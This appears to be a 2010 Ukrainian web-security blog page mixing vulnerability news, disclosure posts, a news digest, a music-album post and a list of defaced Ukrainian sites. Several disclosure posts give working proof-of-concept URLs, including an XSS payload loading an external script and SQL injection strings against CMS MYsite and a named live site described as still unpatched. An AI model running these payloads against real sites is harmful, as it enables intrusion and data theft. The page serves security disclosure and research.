Міжсайтовий доступ в Opera

19:46 25.09.2010

Виявлена можливість міжсайтового доступу в Opera.

Уразливі версії: Opera 10.62.

Міжсайтовий скриптінг через @import url().

  • Opera Web Browser v10.62 (CSS) Cross Domain Vulnerability (деталі)

Уразливості в CMS MYsite

15:24 25.09.2010

29.06.2010

У листопаді, 20.11.2009, я знайшов Full path disclosure, Cross-Site Scripting та SQL Injection уразливості в CMS MYsite (це українська комерційна CMS). Які я виявив на lookmy.info - сайті розробників системи. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

25.09.2010

Full path disclosure:

http://site/portal/modules.php?name=Ads

XSS:

http://site/portal/modules.php?name=Web_Links&l_op=search&query=%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20

SQL Injection:

http://site/print.php?id=1&pid=-1%20or%201=1

CMS MYsite зроблена на основі PHP-Nuke, тому SQL Injection подібна до уразливості, що я знаходив в PHP-Nuke та його клонах декілька років тому. В даній CMS можуть бути й інші дірки PHP-Nuke.

Дані уразливості вже виправлені розробником після мого повідомлення (як мінімум в себе на сайті). Але зазначу, що хоча XSS виправлена, але не якісно, тому при виключених mq на сайті (це потрібно для використання лапок) можна провести XSS атаку (для виконання коду або редирекції на інші сайти), зокрема з використанням MouseOverJacking.

Новини: соціальна інженерія, російська група хакерів та онлайн ринок експлоітів

22:48 24.09.2010

Пропоную вашій увазі добірку цікавих новин на тему безпеки.

За повідомленням hackzona.com.ua, американець вкрав $11 тис. за допомогою одного телефонного дзвінка.

Житель штату Огайо обікрав американського рітейлера Wal-Mart на $11000 за допомогою навичок соціальної інженерії. Близько години ночі в неділю, п’ятого вересня, чоловік подзвонив на цілодобову лінію магазину Wal-Mart в місті Колумбус і зумів переконати оператора активувати декілька платіжних карт і сказати йому активаційні коди. Повідомляється, що зловмисник завдав магазину збиток в розмірі понад $11000.

За повідомленням www.cio-world.ru, у Москві ліквідована група хакерів. Відділ “К” і УБЕЗ РУВС м. Москви ліквідували злочинну групу хакерів, що заражали вірусами-блокаторами персональні комп’ютери користувачів мережі Інтернет.

Члени групи хакерів брали участь у розробці і поширенні вірусів блокаторів, що заражали персональні комп’ютери при відвідуванні ряду різних сайтів. Вірус цілком блокував роботу персонального комп’ютера, а на моніторі користувача з’являлася порнографічна картинка і повідомлення, у якому говорилося, що для розблокування комп’ютера необхідний пароль, що користувач міг одержати, відіславши платне SMS-повідомлення на чотиризначний номер.

Від дій хакерів постраждали десятки тисяч користувачів Інтернету не тільки в Росії, але і на Україні, у Білорусії, Молдавії і країнах Балтії. Зловмисники діяли біля року і, по оцінках співробітників міліції, одержали незаконний доход більше 500 млн. рублів.

За повідомленням hackzona.com.ua, NSS Labs запустить онлайн ринок експлоітів.

Компанія NSS Labs, яка спеціалізується на тестуванні продуктів безпеки, збирається запустити онлайновий ринок експлоітів в наступному місяці. Сервіс Exploit Hub надасть дослідникам безпеки можливість продавати коди експлоітів для відомих уразливостей.

Численні уразливості в Apple WebKit і Safari

19:12 24.09.2010

Виявлені численні уразливості безпеки в Apple WebKit і Safari.

Уразливі версії: Apple Safari 4.1, Safari 5.0.

Виконання коду, пошкодження пам’яті.

  • Apple Safari Webkit Runin Remote Code Execution Vulnerability (деталі)
  • About the security content of Safari 5.0.2 and Safari 4.1.2 (деталі)

Добірка уразливостей

15:07 24.09.2010

В даній добірці уразливості в веб додатках:

  • Cherokee Web Server 0.5.3 Multiple Vulnerabilities (деталі)
  • Re: Cherokee Web Server 0.5.4 Denial Of Service (деталі)
  • Zoph Multiple Parameter Cross Site Scripting Vulnerabilities (деталі)
  • iScripts SocialWare 2.2.x Multiple Remote Vulnerability (деталі)
  • Canteen Joomla Component 1.0 Multiple Remote Vulnerabilities (деталі)
  • iScripts MultiCart 2.2 Multiple SQL Injection Vulnerability (деталі)
  • Joomla BookLibrary From Same Author Module “id” SQL Injection (деталі)
  • NTSOFT BBS E-Market Professional = XSS / Remote Execution Code (деталі)
  • XM Easy Personal FTP Server Remote DoS Vulnerability (деталі)
  • XM Easy Personal FTP Server ‘APPE’ and ‘DELE’ Command Remote Denial of Service Vulnerability (деталі)

Уразливості на feedvalidator.org

23:59 23.09.2010

В серпні, 15.08.2010, я знайшов Abuse of Functionality та Insufficient Anti-automation на сайті http://feedvalidator.org. Про що найближчим часом сповіщу адміністрацію сайта.

Про подібні уразливості я писав в статті Використання сайтів для атак на інші сайти.

Abuse of Functionality:

http://feedvalidator.org/check.cgi?url=http://www.google.com

Даний функціонал може використовуватися для атаки на інші сайти. А також для проведення DoS атаки на сам сайт.

Insufficient Anti-automation:

В даному функціоналі немає захисту від автоматизованих запитів (капчі).

Обхід аутентифікації в Mikrotik Hotspot

22:49 23.09.2010

Продовжуючи розпочату традицію, після попереднього відео про експлоіт для LNK уразливості в Microsoft Windows, пропоную новий відео секюріті мануал. Цього разу відео про обхід аутентифікації в Mikrotik Hotspot. Рекомендую подивитися всім хто цікавиться цією темою.

How to bypass Mikrotik Hotspot Login Page

В відео показана робота Mikrotik Hotspot, що обмежує доступ в Інтернет для залогінених користувачів. І автор відео обходить аутентифікацію в Mikrotik Hotspot і отримує вільний доступ в Інтернет. Рекомендую подивитися дане відео для розуміння векторів атак з використанням подібних уразливостей в Mikrotik Hotspot та інших системах.

Моя музика: My own Rave World

18:08 23.09.2010

Через більш як сім років, після того як я виклав свій перший “майже комерційний” альбом “Жахи”, я нарешті знайшов час, щоб викласти свій новий альбом. І вчора я розмістив мій другий “майже комерційний” альбом “My own Rave World” (Мій власний рейвовий світ). Частина з даних композицій була написана під час створення композицій з альбому “Жахи”, а частина пізніше.

До альбому увійшли 10 композицій, що були створені мною на протязі 1999 - 2001 років. Це наступні композиції:

  1. Disconnect
  2. It’s a Sonic
  3. Keep me free
  4. Mad Song
  5. Не вмирай
  6. Повернення електроніки
  7. Сумні думки
  8. Welcome to Rave World
  9. Welcome to Rave World (mix)
  10. З новим тисячоліттям

Уразливість на rawfoodsnewsmagazine.com

15:20 23.09.2010

21.01.2010

У травні, 24.05.2009, я знайшов SQL Injection уразливість на сайті http://www.rawfoodsnewsmagazine.com. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

23.09.2010

SQL Injection:

http://www.rawfoodsnewsmagazine.com/modules.php?op=modload&name=News&file=article&sid=-1%20or%20version()=5

Уразливість досі не виправлена.

Похакані сайти №113

22:40 22.09.2010

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://chocolate.lviv.ua (хакером ArTiN) - 14.09.2010, зараз сайт вже виправлений адмінами
  • http://maritimelawschool.in.ua (хакерами AtoM і D4nnY) - 06.09.2010, зараз сайт не працює (немає контенту)
  • http://www.cvoippo.edu.ua (хакером kaMtiEz) - 20.09.2010, зараз сайт вже виправлений адмінами
  • http://nbook.info (хакером Aquantes)
  • http://www.avtohifi.com (хакером Top 511) - 06.09.2010, зараз сайт вже виправлений адмінами